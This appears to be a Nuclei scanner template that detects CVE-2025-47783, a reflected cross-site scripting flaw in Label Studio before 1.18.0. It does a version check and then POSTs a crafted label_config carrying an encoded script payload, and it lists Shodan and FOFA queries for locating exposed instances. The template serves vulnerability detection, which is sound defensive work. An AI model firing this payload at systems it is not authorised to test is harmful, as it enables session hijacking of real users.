id: CVE-2025-47783

info:
  name: Label Studio < 1.18.0 - Reflected XSS
  author: 0x_Akoko
  severity: medium
  description: |
    Label Studio < 1.18.0 contains a reflected XSS caused by improper sanitization in the POST /projects/upload-example/ endpoint, letting attackers inject malicious scripts to hijack sessions and perform unauthorized actions. Exploitation requires sending crafted requests.
  impact: |
    Attackers can hijack user sessions, steal data, and perform unauthorized actions via injected scripts.
  remediation: |
    Upgrade to version 1.18.0 or later.
  reference:
    - https://github.com/HumanSignal/label-studio/security/advisories/GHSA-8jhr-wpcm-hh4h
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: humansignal
    product: label-studio
    shodan-query: title:"Label Studio"
    fofa-query: title="Label Studio"
  tags: label-studio,xss,reflected

flow: http(1) && http(2)

http:
  # Request 1: read the release from /version and continue only for releases below 1.18.0.
  - raw:
      - |
        GET /version HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "label-studio")'
          - 'compare_versions(lsversion, "< 1.18.0")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        part: body
        regex:
          - '"release":\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?)'
        group: 1
        internal: true

  # Request 2: submit the label_config probe and check for unescaped reflection in an HTML response.
  - raw:
      - |
        POST /projects/upload-example/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22%24textjmwwi%26lt%3bscript%26gt%3balert(document.domain)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # Unescaped form of the entity-encoded payload sent in label_config above.
          - "<script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022059e7488726a01078b95911794f3531c6dc025cdeee18ef73cfd45eee1fd780620221008d944d3b2f8b2027595e8fad74c7c9c05ad0868d4bf92497c6e4424914e817cc:922c64590222798bb761d5b6d8e72950